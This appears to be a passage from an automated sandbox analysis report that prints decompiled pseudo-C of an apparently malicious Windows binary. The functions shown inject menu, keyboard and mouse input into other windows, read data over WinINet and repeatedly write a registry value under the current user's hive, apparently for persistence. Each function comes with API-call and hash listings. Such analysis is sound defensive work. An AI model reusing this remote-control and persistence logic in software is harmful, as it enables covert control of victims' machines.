    				if(_t83 == 0) {
    					SetKeyboardState( *0x42eeb0);
    					L24:
    					SetEvent( *0x42eeac);
    					return 0;
    				}
    				if(_t83 <= 0 || _t29 > 0xffffffff) {
    					_v20.top = _t29 >> 0x10;
    					_v20.bottom = _t61 >> 0x10;
    					_v20.right = _t61 & 0x0000ffff;
    					_v20.left = _t29 & 0x0000ffff;
    					E0041B6E0( &_v20, __eflags, 0x42eea0, _a4, 0);
    					goto L24;
    				} else {
    					_t78 = GetMenu(_a4);
    					if(_t78 == 0) {
    						goto L24;
    					}
    					_t58 = _t56 | 0xffffffff;
    					_t40 = GetMenuItemCount(_t78);
    					_t74 = 0;
    					_v24 = _t40;
    					if(_t40 <= 0) {
    						L9:
    						_t41 =  *0x42eeb0;
    						_push(_t41[0x104]);
    						_t75 = MenuItemFromPoint(_a4, _t78, _t41[0x100]);
    						if(_t75 == 0xffffffff) {
    							goto L24;
    						}
    						_v24 = GetMenuState(_t78, _t75, 0x400);
    						if(_t58 != _t75) {
    							EndMenu();
    						}
    						_t59 = _a4;
    						HiliteMenuItem(_t59, _t78, _t75, 0x480);
    						if(_a8 != 0xfffffffe) {
    							_t46 = _v24;
    							if((_t46 & 0x00000003) != 0) {
    								goto L24;
    							}
    							if((_t46 & 0x00000010) == 0) {
    								__eflags = _t46 & 0x00000800;
    								if((_t46 & 0x00000800) == 0) {
    									_t47 = GetMenuItemID(_t78, _t75);
    									__eflags = _t47 - 0xffffffff;
    									if(_t47 == 0xffffffff) {
    										goto L24;
    									}
    									L21:
    									SendMessageW(_t59, 0x111, _t47 & 0x0000ffff, 0);
    									goto L24;
    								}
    								_t47 = 0;
    								goto L21;
    							}
    							_t60 = GetSubMenu(_t78, _t75);
    							if(_t60 != 0) {
    								_t79 = _a4;
    								if(GetMenuItemRect(_t79, _t78, _t75,  &_v20) != 0) {
    									TrackPopupMenuEx(_t60, 0x4000, _v20, _v20.bottom, _t79, 0);
    								}
    							}
    						}
    						goto L24;
    					} else {
    						do {
    							if(GetMenuState(_t78, _t74, 0x400) < 0) {
    								HiliteMenuItem(_a4, _t78, _t74, 0x400);
    								_t58 = _t74;
    							}
    							_t74 = _t74 + 1;
    						} while (_t74 < _v24);
    						goto L9;
    					}
    				}
    			}

    APIs
    • GetMenu.USER32(?), ref: 00426ABB
    • GetMenuItemCount.USER32 ref: 00426ACF
    • GetMenuState.USER32 ref: 00426AE7
    • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00426AFC
    • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 00426B23
    • GetMenuState.USER32 ref: 00426B3B
    • EndMenu.USER32 ref: 00426B49
    • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 00426B5A
    • GetSubMenu.USER32 ref: 00426B7C
    • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 00426B97
    • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 00426BB8
    • GetMenuItemID.USER32(00000000,00000000), ref: 00426BCD
    • SendMessageW.USER32(?,00000111,?,00000000), ref: 00426BE4
    • SetKeyboardState.USER32(?), ref: 00426C25
    • SetEvent.KERNEL32(?), ref: 00426C31
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: 0095f85532610d6f0709270e8290b88663ce7f3bca220dc5e822ad311b4ef535
    • Instruction ID: 701b790957232c86f41415b2f2d80616bab8e2b93198e32930c083f84b82f57e
    • Opcode Fuzzy Hash: 0095f85532610d6f0709270e8290b88663ce7f3bca220dc5e822ad311b4ef535
    • Instruction Fuzzy Hash: 64419874200321AFD310AF36AD88EAB7BA8EB85755F414A1AFD55D72E0C774D801CB6D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004278B0(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
    				intOrPtr _v40;
    				struct tagWINDOWINFO _v64;
    				signed int _v68;
    				signed int _v72;
    				signed int _v76;
    				signed char _v80;
    				long _v84;
    				signed short _v88;
    				intOrPtr _v96;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t143;
    				struct HWND__* _t145;
    				signed int _t147;
    				signed int _t149;
    				signed int _t151;
    				signed short _t156;
    				void* _t160;
    				void* _t163;
    				void* _t166;
    				signed int _t172;
    				struct HWND__* _t173;
    				signed short _t174;
    				signed short _t176;
    				signed short _t178;
    				intOrPtr _t182;
    				signed char _t190;
    				signed int _t194;
    				long _t199;
    				signed short _t222;
    				signed int _t225;
    				signed short _t245;
    				struct HWND__* _t251;
    				struct HWND__* _t252;
    				void* _t254;
    				intOrPtr _t256;
    
    				_t254 = __eax;
    				_t143 =  *((intOrPtr*)(__eax + 0x10));
    				_t225 = 0;
    				_v84 = 0;
    				if( *((intOrPtr*)(_t143 + 0x110)) == 0) {
    					_t199 =  *((intOrPtr*)(_t143 + 0x108));
    					_v84 = _t199;
    					if(_t199 == 0) {
    						L18:
    						_t190 = _a4;
    						_v80 = _t225;
    						goto L19;
    					}
    					_t222 = 0;
    					if(( *(_t143 + 1) & 0x00000080) != 0) {
    						_t222 = 1;
    					}
    					if(( *(_t143 + 2) & 0x00000080) != 0) {
    						_t222 = _t222 | 0x00000002;
    					}
    					if(( *(_t143 + 4) & 0x00000080) != 0) {
    						_t222 = _t222 | 0x00000010;
    					}
    					if(( *(_t143 + 0x10) & 0x00000080) != 0) {
    						_t222 = _t222 | 0x00000004;
    					}
    					if(( *(_t143 + 0x11) & 0x00000080) != 0) {
    						_t222 = _t222 | 0x00000008;
    					}
    					_t225 = _t222 & 0x0000ffff;
    					goto L18;
    				} else {
    					_t190 = _a4;
    					if((_t190 & 0x00000001) != 0) {
    						E00427350(_a12, _a8, __eax);
    						_t190 = _t190 & 0xfffffffe;
    						_a4 = _t190;
    					}
    					if((_t190 & 0x00000004) != 0) {
    						WaitForSingleObject( *(_t254 + 0x14), 0xffffffff);
    						_t182 =  *((intOrPtr*)(_t254 + 0x10));
    						_t252 =  *(_t182 + 0x108);
    						 *((intOrPtr*)(_t182 + 0x10c)) = 0;
    						 *((intOrPtr*)( *((intOrPtr*)(_t254 + 0x10)) + 0x108)) = 0;
    						 *((short*)( *((intOrPtr*)(_t254 + 0x10)) + 0x110)) = 0;
    						ReleaseMutex( *(_t254 + 0x14));
    						if(IsWindow(_t252) != 0) {
    							PostMessageW(_t252, 0x215, 0, 0);
    						}
    					}
    					L19:
    					 *( *((intOrPtr*)(_t254 + 0x10)) + 0x100) = _a8;
    					_t145 = _a12;
    					 *( *((intOrPtr*)(_t254 + 0x10)) + 0x104) = _t145;
    					if(_t190 == 0) {
    						L89:
    						return _t145;
    					}
    					_t147 = _t190 & 0x00000002;
    					_v76 = _t147;
    					if(_t147 == 0) {
    						if((_t190 & 0x00000004) == 0) {
    							L25:
    							_t149 = _t190 & 0x00000020;
    							_v72 = _t149;
    							if(_t149 == 0) {
    								if((_t190 & 0x00000040) == 0) {
    									L30:
    									_t151 = _t190 & 0x00000008;
    									_v68 = _t151;
    									if(_t151 == 0) {
    										if((_t190 & 0x00000010) == 0) {
    											L35:
    											_t251 = E00416F00(0x64,  &_v88,  *( *((intOrPtr*)(_t254 + 0x10)) + 0x100),  *( *((intOrPtr*)(_t254 + 0x10)) + 0x104));
    											if(_v96 + 0xfffffff6 <= 7) {
    												_t172 = GetWindowLongW(_t251, 0xfffffff0);
    												if((_t172 & 0x40000000) != 0 && (_t172 & 0x00c00000) != 0xc00000 && (_t172 & 0x80040000) == 0) {
    													_t173 = GetParent(_t251);
    													if(_t173 != 0) {
    														_t251 = _t173;
    													}
    												}
    											}
    											if(_t251 == 0) {
    												L46:
    												_t145 = _v84;
    												if(_t145 != 0) {
    													_t145 = IsWindow(_t145);
    													if(_t145 == 0 || _t251 != 0 && _v84 != _t251 && (_v80 & 0x00000007) == 0) {
    														if(_t190 != 0x8001) {
    															_t145 = E004272D0(0, _t254, 0, 0, 1);
    														}
    													} else {
    														_t251 = _v84;
    														_v88 = 1;
    													}
    												}
    												goto L54;
    											} else {
    												_t145 = E004260D0(_t251);
    												if((_t145 & 0x00000040) == 0) {
    													goto L46;
    												}
    												if(_t251 != _v84) {
    													_t145 = E004272D0(_t251, _t254, GetWindowThreadProcessId(_t251, 0), 0, 1);
    												}
    												_v88 = 1;
    												L54:
    												if(_t251 == 0) {
    													goto L89;
    												}
    												_v64.cbSize = 0x3c;
    												_t145 = GetWindowInfo(_t251,  &_v64);
    												if(_t145 == 0) {
    													goto L89;
    												}
    												_t145 = _a8 & 0x0000ffff;
    												_t194 = (_a12 & 0x0000ffff) << 0x00000010 | _t145;
    												_v84 = _t194;
    												if(_v88 != 1) {
    													_t194 = _v68;
    												} else {
    													_t145 = E004260D0(_t251);
    													if((_t145 & 0x00000020) == 0) {
    														_t145 = _a8 - _v64.rcClient;
    														_t194 = (_a12 - _v40 & 0x0000ffff) << 0x00000010 | _t145 & 0x0000ffff;
    													}
    												}
    												if(_v76 == 0) {
    													if((_a4 & 0x00000004) == 0) {
    														goto L65;
    													}
    													_push(_v84);
    													_push(_t194);
    													_push(0xa2);
    													_push(_v88);
    													_t166 = 0x202;
    													goto L64;
    												} else {
    													_push(_v84);
    													_push(_t194);
    													_push(0xa1);
    													_push(_v88);
    													_t166 = 0x201;
    													L64:
    													_push( &_v64);
    													_t145 = E004275A0(_t166, _t254);
    													L65:
    													if(_v72 == 0) {
    														if((_a4 & 0x00000040) == 0) {
    															L70:
    															if(_v68 == 0) {
    																if((_a4 & 0x00000010) == 0) {
    																	L75:
    																	if((_a4 & 0x00000001) != 0) {
    																		_push(_v84);
    																		_push(_t194);
    																		_push(0xa0);
    																		_push(_v88);
    																		_push( &_v64);
    																		_t145 = E004275A0(0x200, _t254);
    																	}
    																	if((_a4 & 0x00000800) != 0) {
    																		_t256 =  *((intOrPtr*)(_t254 + 0x10));
    																		_t156 = 0;
    																		if(( *(_t256 + 1) & 0x00000080) != 0) {
    																			_t156 = 1;
    																		}
    																		if(( *(_t256 + 2) & 0x00000080) != 0) {
    																			_t156 = _t156 | 0x00000002;
    																		}
    																		if(( *(_t256 + 4) & 0x00000080) != 0) {
    																			_t156 = _t156 | 0x00000010;
    																		}
    																		if(( *(_t256 + 0x10) & 0x00000080) != 0) {
    																			_t156 = _t156 | 0x00000004;
    																		}
    																		if(( *(_t256 + 0x11) & 0x00000080) != 0) {
    																			_t156 = _t156 | 0x00000008;
    																		}
    																		_t145 = PostMessageW(_t251, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | _t156 & 0x0000ffff, _v84);
    																	}
    																	goto L89;
    																}
    																_push(_v84);
    																_push(_t194);
    																_push(0xa5);
    																_push(_v88);
    																_t160 = 0x205;
    																L74:
    																_push( &_v64);
    																_t145 = E004275A0(_t160, _t254);
    																goto L75;
    															}
    															_push(_v84);
    															_push(_t194);
    															_push(0xa4);
    															_push(_v88);
    															_t160 = 0x204;
    															goto L74;
    														}
    														_push(_v84);
    														_push(_t194);
    														_push(0xa8);
    														_push(_v88);
    														_t163 = 0x208;
    														L69:
    														_push( &_v64);
    														_t145 = E004275A0(_t163, _t254);
    														goto L70;
    													}
    													_push(_v84);
    													_push(_t194);
    													_push(0xa7);
    													_push(_v88);
    													_t163 = 0x207;
    													goto L69;
    												}
    											}
    										}
    										_t174 = 0;
    										L34:
    										E004265F0(_t174, _t254, 2);
    										goto L35;
    									}
    									_t174 = 1;
    									goto L34;
    								}
    								_t176 = 0;
    								L29:
    								E004265F0(_t176, _t254, 4);
    								goto L30;
    							}
    							_t176 = 1;
    							goto L29;
    						}
    						_t178 = 0;
    						_t245 = 1;
    						L24:
    						E004265F0(_t178, _t254, _t245);
    						goto L25;
    					}
    					_t178 = 1;
    					_t245 = 1;
    					goto L24;
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004278FA
    • ReleaseMutex.KERNEL32(?), ref: 00427928
    • IsWindow.USER32(?), ref: 0042792F
    • PostMessageW.USER32(?,00000215,00000000,00000000), ref: 00427943
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00427A43
    • GetParent.USER32(00000000), ref: 00427A68
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00427A8C
    • GetWindowInfo.USER32 ref: 00427B05
      • Part of subcall function 00427350: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,004278E5), ref: 00427363
      • Part of subcall function 00427350: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,004278E5), ref: 00427381
      • Part of subcall function 00427350: GetWindowRect.USER32 ref: 00427391
      • Part of subcall function 00427350: IsRectEmpty.USER32(?), ref: 00427414
      • Part of subcall function 00427350: GetWindowLongW.USER32(?,000000F0), ref: 00427425
      • Part of subcall function 00427350: GetParent.USER32(?), ref: 0042743A
      • Part of subcall function 00427350: MapWindowPoints.USER32 ref: 00427443
      • Part of subcall function 00427350: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C,?,?,?,?,?,?,?,004278E5), ref: 00427469
    • IsWindow.USER32(?), ref: 00427AB1
    • PostMessageW.USER32(00000000,0000020A,?,?), ref: 00427CA8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
    • String ID: <$@
    • API String ID: 3705211839-1426351568
    • Opcode ID: fe0fc4a1f282392f8f2005970487983fa3a80dd361cb3006e2f9bfcc633b22a5
    • Instruction ID: b9061d52e2b6dc0c7c6ca2de3649f700c848a13209ae29920eb0622225c8673a
    • Opcode Fuzzy Hash: fe0fc4a1f282392f8f2005970487983fa3a80dd361cb3006e2f9bfcc633b22a5
    • Instruction Fuzzy Hash: 5EC1EEB03083519BE324CF28E884B6B77E4AF85314F888A2EF8A5873D1C778D841C759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E0040B560(long* __eax, void** __ecx, intOrPtr _a4, void* _a8) {
    				intOrPtr _v28;
    				void* _v44;
    				char _v52;
    				void* _v56;
    				char _v57;
    				intOrPtr _v64;
    				signed int _v72;
    				char _v73;
    				intOrPtr _v81;
    				void* _t23;
    				void* _t25;
    				void* _t26;
    				void* _t32;
    				void* _t34;
    				void* _t41;
    				intOrPtr _t42;
    				void* _t53;
    				long* _t64;
    				void** _t69;
    				void* _t71;
    
    				_t64 = __eax;
    				_t69 = __ecx;
    				ResetEvent(_a8);
    				_t23 = HeapAlloc( *0x42e6d4, 8, 0x1004);
    				_t41 = _t23;
    				if(_t41 != 0) {
    					__imp__InternetSetStatusCallbackW(_a4, E0040B4E0);
    					_v56 = _t23;
    					 *_t69 = 0;
    					 *_t64 = 0;
    					_v57 = 1;
    					_t25 = E00410870( &_v52,  &_v52, 0, 0x28);
    					_v64 = 0x28;
    					_v44 = _t41;
    					while(1) {
    						L3:
    						_v28 = 0x1000;
    						__imp__InternetReadFileExA(_a4,  &_v52, 8, 0);
    						if(_t25 == 0) {
    							break;
    						}
    						_t26 = _v44;
    						if(_t26 != 0) {
    							_t53 =  *_t64 + _t26;
    							_t32 =  *_t69;
    							if(_t53 != 0) {
    								_push(_t53 + 4);
    								if(_t32 != 0) {
    									_t34 = HeapReAlloc( *0x42e6d4, 8, _t32, ??);
    								} else {
    									_t34 = HeapAlloc( *0x42e6d4, 8, ??);
    								}
    								if(_t34 == 0) {
    									L17:
    									_v73 = 0;
    								} else {
    									 *_t69 = _t34;
    									goto L16;
    								}
    							} else {
    								if(_t32 != 0) {
    									HeapFree( *0x42e6d4, 0, _t32);
    								}
    								 *_t69 = 0;
    								L16:
    								E00410820( *_t69 +  *_t64, _t41, _v44);
    								_t25 = _v56;
    								 *_t64 = _t25 +  *_t64;
    								continue;
    							}
    						}
    						L18:
    						_t18 = _v72 + 1; // 0x1
    						asm("sbb ecx, ecx");
    						__imp__InternetSetStatusCallbackW(_a4,  ~_t18 & _v72);
    						HeapFree( *0x42e6d4, 0, _t41);
    						_t42 = _v81;
    						if(_t42 == 0) {
    							_t71 =  *_t69;
    							if(_t71 != 0) {
    								HeapFree( *0x42e6d4, 0, _t71);
    							}
    						}
    						return _t42;
    						goto L22;
    					}
    					if(GetLastError() != 0x3e5) {
    						goto L17;
    					} else {
    						_t25 = E004156D0( &_a8);
    						goto L3;
    					}
    					goto L18;
    				} else {
    					return 0;
    				}
    				L22:
    			}
























    APIs
    • ResetEvent.KERNEL32(?), ref: 0040B574
    • HeapAlloc.KERNEL32(?,00000008,00001004), ref: 0040B588
    • InternetSetStatusCallbackW.WININET(?,0040B4E0), ref: 0040B5A8
    • InternetReadFileExA.WININET ref: 0040B5F5
    • GetLastError.KERNEL32 ref: 0040B5FF
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040B639
    • HeapAlloc.KERNEL32(?,00000008), ref: 0040B658
    • InternetSetStatusCallbackW.WININET(?,00000001), ref: 0040B6A7
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040B6BC
    • HeapFree.KERNEL32(?,00000000), ref: 0040B6D6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$FreeInternet$AllocCallbackStatus$ErrorEventFileLastReadReset
    • String ID: (
    • API String ID: 1804432496-3887548279
    • Opcode ID: 0dbe69b3d4efdbbf3a02e238a53a46fbec4a70d88d0f98d5311a00ebc111775b
    • Instruction ID: ab7d25f95fa8cb55c83245189734e94b5c9bc1cd706bf4337ef9838c26cad16c
    • Opcode Fuzzy Hash: 0dbe69b3d4efdbbf3a02e238a53a46fbec4a70d88d0f98d5311a00ebc111775b
    • Instruction Fuzzy Hash: BA41AE71200205ABD324DF65DC85F6B77A8EB98304F50493EF981EB2D0DB75E804CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041BEB0() {
    				void* __ebx;
    				void* __edi;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				void* _t35;
    				void* _t44;
    				void* _t45;
    				void* _t52;
    				void* _t65;
    				void** _t66;
    				intOrPtr _t67;
    				void* _t68;
    				void* _t69;
    
    				_t67 =  *((intOrPtr*)(_t68 + 0x5fc));
    				_t21 =  *(_t67 + 0x180);
    				if(_t21 == 0 || WaitForSingleObject(_t21, 0) != 0x102) {
    					_t22 =  *(_t67 + 0x180);
    					_t66 = _t67 + 0x17c;
    					if(_t22 != 0) {
    						CloseHandle(_t22);
    					}
    					_t23 =  *_t66;
    					_t73 = _t23;
    					if(_t23 != 0) {
    						_t23 = CloseHandle(_t23);
    					}
    					E00410870(_t23, _t66, 0, 0x10);
    					_t64 = _t68 + 0xd8;
    					E0041D210(1, _t68 + 0xd8);
    					E0041D150(_t68 + 0x2e0);
    					E00410870(E00416E10(0x42eb70, _t68 + 0x36c,  *0x42e904, _t68 + 0x74, 0), _t68 + 0x30, 0, 0x44);
    					 *((intOrPtr*)(_t68 + 0x2c)) = 0x44;
    					 *((intOrPtr*)(_t68 + 0x34)) = _t68 + 0x70;
    					ResetEvent( *(_t67 + 0xc));
    					_push(L"-v");
    					_t35 = E00411DC0(_t73, _t68 + 0x1c, L"\"%s\" %s", _t64);
    					_t69 = _t68 + 0x10;
    					if(_t35 <= 0) {
    						L16:
    						return 0;
    					} else {
    						_t65 =  *(_t69 + 0x14);
    						_t52 = E00412B40(_t69 + 0x2c, _t69 + 0x1c, _t65, 0);
    						if(_t65 != 0) {
    							HeapFree( *0x42e6d4, 0, _t65);
    						}
    						if(_t52 == 0) {
    							goto L16;
    						} else {
    							E00410820(_t66, _t69 + 0x1c, 0x10);
    							if(WaitForSingleObject( *(_t67 + 0xc), 0x3e8) == 0) {
    								goto L17;
    							} else {
    								TerminateProcess( *_t66, 0);
    								_t44 = _t66[1];
    								if(_t44 != 0) {
    									CloseHandle(_t44);
    								}
    								_t45 =  *_t66;
    								if(_t45 != 0) {
    									_t45 = CloseHandle(_t45);
    								}
    								E00410870(_t45, _t66, 0, 0x10);
    								goto L16;
    							}
    						}
    					}
    				} else {
    					L17:
    					return 1;
    				}
    			}


















    APIs
    • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,77426AF0), ref: 0041BECE
    • CloseHandle.KERNEL32(?,?,?,?,77426AF0), ref: 0041BEF0
    • CloseHandle.KERNEL32(?,?,?,?,77426AF0), ref: 0041BEFD
    • ResetEvent.KERNEL32(?,00000000,00000000), ref: 0041BF70
    • HeapFree.KERNEL32(?,00000000,?,00000000,?,?,?,77426AF0), ref: 0041BFB9
    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,00000000,?,?,?,77426AF0), ref: 0041BFD9
    • TerminateProcess.KERNEL32(?,00000000,?,?,?,77426AF0), ref: 0041BFE8
    • CloseHandle.KERNEL32(?,?,00000000,?,?,?,77426AF0), ref: 0041BFF6
    • CloseHandle.KERNEL32(?,?,00000000,?,?,?,77426AF0), ref: 0041C003
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$ObjectSingleWait$EventFreeHeapProcessResetTerminate
    • String ID: "%s" %s$D$pB
    • API String ID: 160799-2325083392
    • Opcode ID: f726d7da8469988cd2f717a1e489e627e0bf806277f2863a0ee7cfd934227047
    • Instruction ID: 9544458144c1ad98f5ef39895b3123b30db02e77d2dba738327293e52d91d0c1
    • Opcode Fuzzy Hash: f726d7da8469988cd2f717a1e489e627e0bf806277f2863a0ee7cfd934227047
    • Instruction Fuzzy Hash: 0141D771240305ABD730AF65DD85FDB779CAB84700F04482EBA44E7291DB78E945CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040EB40(void* __ecx, void* __edx, void* __eflags) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				int _t32;
    				long _t37;
    				int _t39;
    				long _t41;
    				WCHAR* _t65;
    				signed int _t66;
    				void* _t72;
    				void* _t74;
    				void* _t75;
    
    				_t75 = __eflags;
    				SetThreadPriority(GetCurrentThread(), 0);
    				_t72 = E0041CDD0(_t75, 0x19367402, 1);
    				 *(_t74 + 8) = _t72;
    				if(_t72 != 0) {
    					E0041D150(_t74 + 0x2dc);
    					E00416E10(0x42eb70, _t74 + 0x368,  *0x42e904, _t74 + 0x74, 0);
    					_t65 = _t74 + 0xd4;
    					E0041D210(1, _t65);
    					PathQuoteSpacesW(_t65);
    					_t66 = 0;
    					__eflags =  *(_t74 + 0xd4);
    					if( *(_t74 + 0xd4) != 0) {
    						do {
    							_t66 = _t66 + 1;
    							__eflags =  *((short*)(_t74 + 0xd4 + _t66 * 2));
    						} while ( *((short*)(_t74 + 0xd4 + _t66 * 2)) != 0);
    					}
    					_t32 = WaitForSingleObject( *0x42edbc, 0);
    					__eflags = _t32;
    					if(_t32 != 0) {
    						E00424100(3, _t74 + 0x18);
    						_t37 = WaitForSingleObject( *0x42edbc, 0xc8);
    						__eflags = _t37 - 0x102;
    						if(_t37 == 0x102) {
    							do {
    								 *(_t74 + 0x34) = 0x80000001;
    								_t39 = RegCreateKeyExW(0x80000001, _t74 + 0x34, 0, 0, 0, 2, 0, _t74 + 0x14, 0);
    								__eflags = _t39;
    								if(_t39 == 0) {
    									_t16 = _t66 + 2; // 0x2
    									RegSetValueExW( *(_t74 + 0x14), _t74 + 0x84, _t39, 1, _t74 + 0xdc, _t66 + _t16);
    									RegCloseKey( *(_t74 + 0x10));
    								}
    								_t41 = WaitForSingleObject( *0x42edbc, 0xc8);
    								__eflags = _t41 - 0x102;
    							} while (_t41 == 0x102);
    							_t72 =  *(_t74 + 0x14);
    						}
    					}
    					ReleaseMutex(_t72);
    					CloseHandle(_t72);
    					__eflags = 0;
    					return 0;
    				} else {
    					_t2 = _t72 + 1; // 0x1
    					return _t2;
    				}
    			}
















    APIs
    • GetCurrentThread.KERNEL32 ref: 0040EB49
    • SetThreadPriority.KERNEL32(00000000), ref: 0040EB50
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
    • PathQuoteSpacesW.SHLWAPI(?,?,?,00000000,?,?,19367402,00000001), ref: 0040EBBF
    • WaitForSingleObject.KERNEL32(?,00000000,?,?,19367402,00000001), ref: 0040EBEB
    • WaitForSingleObject.KERNEL32(?,000000C8,?,?,?,19367402,00000001), ref: 0040EC10
    • RegCreateKeyExW.ADVAPI32(80000001,00000000), ref: 0040EC53
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000002), ref: 0040EC76
    • RegCloseKey.ADVAPI32(?), ref: 0040EC7D
    • WaitForSingleObject.KERNEL32(?,000000C8), ref: 0040EC8A
    • ReleaseMutex.KERNEL32(00000000,?,?,19367402,00000001), ref: 0040EC9D
    • CloseHandle.KERNEL32(00000000,?,?,19367402,00000001), ref: 0040ECA4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleWait$Close$CreateHandleMutexThread$CurrentPathPriorityQuoteReleaseSpacesValue
    • String ID: pB
    • API String ID: 1763125157-3059159000
    • Opcode ID: 30d7019010dfa39569445249e9bc314420156b944bd2f1d8ccbfc958b785f38b
    • Instruction ID: a4c82942e19672011408771ac4bf210ff6bac47aad49e3b947c89c636e09cf14
    • Opcode Fuzzy Hash: 30d7019010dfa39569445249e9bc314420156b944bd2f1d8ccbfc958b785f38b
    • Instruction Fuzzy Hash: 8631F371204305ABE320EB91ED85FEB77A9EB88700F00482EF645B72D0DB74E945CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004264F0(void** __eax, char _a4) {
    				void* _t16;
    				void* _t17;
    				long _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				struct HDC__* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    				void* _t28;
    				void** _t47;
    				void** _t48;
    
    				_t47 = __eax;
    				_t16 =  *(__eax + 0x1c);
    				if(_t16 != 0) {
    					DeleteObject(_t16);
    				}
    				_t17 = _t47[3];
    				if(_t17 != 0) {
    					CloseHandle(_t17);
    				}
    				_t18 = _t47[1];
    				if(_t18 != 0xffffffff) {
    					TlsFree(_t18);
    				}
    				_t19 = _t47[5];
    				if(_t19 != 0) {
    					CloseHandle(_t19);
    				}
    				_t20 = _t47[4];
    				if(_t20 != 0) {
    					UnmapViewOfFile(_t20);
    				}
    				_t21 =  *_t47;
    				if(_t21 != 0) {
    					_t21 = CloseHandle(_t21);
    				}
    				if(_a4 != 0) {
    					_t22 = _t47[0x56];
    					if(_t22 != 0) {
    						SelectObject(_t47[0x55], _t22);
    					}
    					_t23 = _t47[0x57];
    					if(_t23 != 0) {
    						DeleteObject(_t23);
    					}
    					_t24 = _t47[0x55];
    					if(_t24 != 0) {
    						DeleteDC(_t24);
    					}
    					_t25 = _t47[0x58];
    					if(_t25 != 0) {
    						CloseHandle(_t25);
    					}
    					_t26 = _t47[0x60];
    					if(_t26 != 0 && WaitForSingleObject(_t26, 0) != 0x102) {
    						PostThreadMessageW(_t47[0x62], 0x12, 0, 0);
    					}
    					_t27 = _t47[0x60];
    					_t48 =  &(_t47[0x5f]);
    					if(_t27 != 0) {
    						CloseHandle(_t27);
    					}
    					_t28 =  *_t48;
    					if(_t28 != 0) {
    						_t28 = CloseHandle(_t28);
    					}
    					_t21 = E00410870(_t28, _t48, 0, 0x10);
    				}
    				return _t21;
    			}



















    APIs
    • DeleteObject.GDI32(?), ref: 00426503
    • CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426513
    • TlsFree.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042651E
    • CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042652C
